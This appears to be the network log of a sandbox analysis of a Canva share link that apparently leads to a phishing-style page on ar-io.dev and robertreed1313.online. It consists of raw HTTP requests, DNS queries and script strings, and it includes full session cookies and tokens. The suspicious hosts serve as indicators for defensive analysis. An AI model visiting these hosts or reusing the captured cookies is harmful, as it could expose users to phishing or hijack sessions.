/ddm/fls/z/src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor;u67=guest;u66=false;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;tag_exp=101925629~102067555~102067808~102077855~102081485;ps=1;pcor=417781846;s3p=1;~oref=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlaHLAQic/swBCPqYzQEIhaDNAQi5ys0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: robertreed1313.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_online?1732114932492 HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=G2oDXGe9bxQ8hlRUwPBKp0ElrJMnL1NXSFbT2F5u9GQ97KuQuqHKVNbBD4hg3xExIqJfmnBkGDWEetZ8e66GnZGuSSRassGfOKiQ0UXdDd7DmH4z6%2BXMqODk9A58Gg%3D%3D
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pO2K6stB2bhAWuO&MD=kHd4COxR HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1.png HTTP/1.1Host: 6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_online?1732114932492 HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=G2oDXGe9bxQ8hlRUwPBKp0ElrJMnL1NXSFbT2F5u9GQ97KuQuqHKVNbBD4hg3xExIqJfmnBkGDWEetZ8e66GnZGuSSRassGfOKiQ0UXdDd7DmH4z6%2BXMqODk9A58Gg%3D%3D
Source: global trafficHTTP traffic detected: GET /_ajax/ae/createBatch HTTP/1.1Host: www.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor","ts":1732114910544,"utm_s":"editor","utm_m":"link"}; Metadata_visitor_id=m3q0hwbly0n1ejeak4k; Metadata_session_id=m3q0hwbmy0cpch0dnpm; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=G2oDXGe9bxQ8hlRUwPBKp0ElrJMnL1NXSFbT2F5u9GQ97KuQuqHKVNbBD4hg3xExIqJfmnBkGDWEetZ8e66GnZGuSSRassGfOKiQ0UXdDd7DmH4z6%2BXMqODk9A58Gg%3D%3D
Source: global trafficHTTP traffic detected: GET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951856&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_name=loaded&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=a%20page&ep.custom_cart_item=%5Bobject%20Object%5D&ep.custom_doctype_id=TACQ-gtv2Yk&ep.custom_product_variant=web-2&ep.custom_country_code=US&ep.custom_app_name=web&up.custom_country_code=US&tfd=33182&richsstsse HTTP/1.1Host: ct.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; FPLC=G2oDXGe9bxQ8hlRUwPBKp0ElrJMnL1NXSFbT2F5u9GQ97KuQuqHKVNbBD4hg3xExIqJfmnBkGDWEetZ8e66GnZGuSSRassGfOKiQ0UXdDd7DmH4z6%2BXMqODk9A58Gg%3D%3D
Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: robertreed1313.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: robertreed1313.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_149.2.drString found in binary or memory: "https?://gfycat.com/*"].map(SN),V:960,za:540,Xg:1,yh:!1,icon:Gj},{name:"Twitter",kh:["https?://twitter.com/*","https?://www.twitter.com/*"].map(SN),V:270,za:440,Xg:1,yh:!1,icon:Gj},{name:"Facebook",kh:["https?://facebook.com/*","https?://www.facebook.com/*"].map(SN),V:500,za:500,Xg:1,yh:!1,icon:Gj},{name:"Tumblr",kh:["https?://*.tumblr.com/*"].map(SN),V:510,za:450,Xg:1,yh:!1,icon:Gj},{name:"Pinterest",kh:["https?://pinterest.com*","https?://www.pinterest.com*"].map(SN),V:640,za:800,Xg:1,yh:!1,icon:Gj}, equals www.facebook.com (Facebook)
Source: chromecache_149.2.drString found in binary or memory: "https?://gfycat.com/*"].map(SN),V:960,za:540,Xg:1,yh:!1,icon:Gj},{name:"Twitter",kh:["https?://twitter.com/*","https?://www.twitter.com/*"].map(SN),V:270,za:440,Xg:1,yh:!1,icon:Gj},{name:"Facebook",kh:["https?://facebook.com/*","https?://www.facebook.com/*"].map(SN),V:500,za:500,Xg:1,yh:!1,icon:Gj},{name:"Tumblr",kh:["https?://*.tumblr.com/*"].map(SN),V:510,za:450,Xg:1,yh:!1,icon:Gj},{name:"Pinterest",kh:["https?://pinterest.com*","https?://www.pinterest.com*"].map(SN),V:640,za:800,Xg:1,yh:!1,icon:Gj}, equals www.twitter.com (Twitter)
Source: chromecache_151.2.dr, chromecache_204.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Ak:function(){e=qb()},zd:function(){d()}}};var Zb=wa(["data-gtm-yt-inspected-"]),ID=["www.youtube.com","www.youtube-nocookie.com"],JD,KD=!1; equals www.youtube.com (Youtube)
Source: chromecache_151.2.dr, chromecache_204.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Dh:e,Bh:f,Ch:g,ji:k,ki:m,Re:n,Ib:b},q=B.YT;if(q)return q.ready&&q.ready(d),b;var r=B.onYouTubeIframeAPIReady;B.onYouTubeIframeAPIReady=function(){r&&r();d()};H(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(TD(w,"iframe_api")||TD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!KD&&RD(x[A],p.Re))return qc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_235.2.dr, chromecache_231.2.drString found in binary or memory: return b}GD.F="internal.enableAutoEventOnTimer";var Zb=wa(["data-gtm-yt-inspected-"]),ID=["www.youtube.com","www.youtube-nocookie.com"],JD,KD=!1; equals www.youtube.com (Youtube)
Source: chromecache_235.2.dr, chromecache_231.2.drString found in binary or memory: var VC=function(a,b,c,d,e){var f=MA("fsl",c?"nv.mwt":"mwt",0),g;g=c?MA("fsl","nv.ids",[]):MA("fsl","ids",[]);if(!g.length)return!0;var k=RA(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);V(121);if(m==="https://www.facebook.com/tr/")return V(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!xz(k,zz(b, equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: url.us.m.mimecastprotect.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.canva.com
Source: global trafficDNS traffic detected: DNS query: static.canva.com
Source: global trafficDNS traffic detected: DNS query: o13855.ingest.sentry.io
Source: global trafficDNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global trafficDNS traffic detected: DNS query: chunk-composing.canva.com
Source: global trafficDNS traffic detected: DNS query: font-public.canva.com
Source: global trafficDNS traffic detected: DNS query: media.canva.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: telemetry.canva.com
Source: global trafficDNS traffic detected: DNS query: cdn.metadata.io
Source: global trafficDNS traffic detected: DNS query: sp.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: p.tvpixel.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ct.canva.com
Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: 6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev
Source: global trafficDNS traffic detected: DNS query: adservice.google.com
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: robertreed1313-1323985617.cos.na-ashburn.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: robertreed1313.online
Source: unknownHTTP traffic detected: POST /api/1767683/envelope/?sentry_key=944d224d45b943ba9f96396432dfd868&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1Host: o13855.ingest.sentry.ioConnection: keep-aliveContent-Length: 465sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.canva.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:01:51 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e5951568f376a4e-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e5951568f376a4ex-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jINbd58MQ8gujPG0Q59B8DCm%2FVoFaHY%2FxWBxE6By3tJKzUFngWmmi%2Bs3AwSIGsTRTVwUnyLykgssfLb%2BvQuaXwYUqlxqLbU0L7PCPt89A5UYEkvqMbGF6yuwOFstdqY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:01:55 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e59516d48666a57-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e59516d48666a57x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=68Dg1vNt2hMiQRTYDxabP4lZH%2F2f89%2B%2FD4N8hbI3zDoaoZRNinwvoBD4ZHqqCQiZ6ZI1tt2%2FWs%2BPEOReBttRElBH97ySCOVeTsoF8rU4STVBdupqAhmRZVpIZfGhhUc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:01:57 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e595179b9a6de96-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e595179b9a6de96x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pMYxtzd3dm%2BOXziZwIL36Y1a8R17hWF0IcTzRMmQnvAMIl2icvcZjv8v56m51TYwh2NJEEHj5QT164df96rzEgce70myCvJHS0wsaoc%2FyCyZzjL0LUjZGOyZmAMWsY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:01:59 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e59518618a04225-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e59518618a04225x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9u3WeWD%2FaIHIkcAJaYGmH22rJL%2BUXFcuhAGLDV8IaBrDvseb0M6vE1s%2B0UjJw0IXpQplmMnFfoTzvZXuV77t5kLboyKw7r6xMp25t91WsC1irq8m0W3zpJqqec5dCU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
